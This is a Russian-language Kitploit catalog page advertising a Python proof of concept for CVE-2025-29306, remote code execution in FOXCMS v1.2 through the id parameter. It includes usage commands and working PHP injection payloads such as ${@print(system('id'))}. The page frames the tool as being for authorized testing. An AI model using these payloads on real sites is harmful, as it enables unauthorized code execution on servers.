Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
FOXCMS-CVE-2025-29306-POC — Python PoC для CVE-2025-29306 — RCE через внедрение параметра в FOXCMS v1.2. Внедряет PHP-код через параметр id на /images/index.html для авторизованного тестирования безопасности. | Kitploit
Инструменты/GitHubGitHub/inok009/foxcms-cve-2025-29306-poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubinok009/foxcms-cve-2025-29306-poc

FOXCMS-CVE-2025-29306-POC

Python PoC для CVE-2025-29306 — RCE через внедрение параметра в FOXCMS v1.2. Внедряет PHP-код через параметр id на /images/index.html для авторизованного тестирования безопасности.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
11 год назадЕщё не проверено

FOXCMS Внедрение параметров RCE – CVE-2025-29306

Этот репозиторий содержит PoC на Python для уязвимости удаленного выполнения кода (RCE) в FOXCMS v1.2, китайской системе управления контентом с открытым исходным кодом.

CVE-ID: CVE-2025-29306
Затрагивает: FOXCMS v1.2
Тип: Внедрение параметров службы → Выполнение кода


Краткое описание уязвимости

FOXCMS страдает от небезопасного механизма разбора параметра id в конечной точке /images/index.html. Это позволяет внедрять полезные нагрузки с использованием выражений ${@print()}, что приводит к выполнению PHP-кода.


Использование PoC

Требования

  • Python 3.x
  • Библиотека requests
root@kitploit:~
pip install requests

# Usage 
python foxcms_poc.py http://target.com/images/index.html?id=

# The script uses payloads like:

${@print(phpinfo())}
${@print(system('id'))}

🔐 Правовое предупреждение

Этот код предназначен только для образовательных целей и авторизованного тестирования безопасности. НЕ используйте его в системах, которыми вы не владеете или на которые не имеете разрешения.

Автор Inok009

Скачать инструмент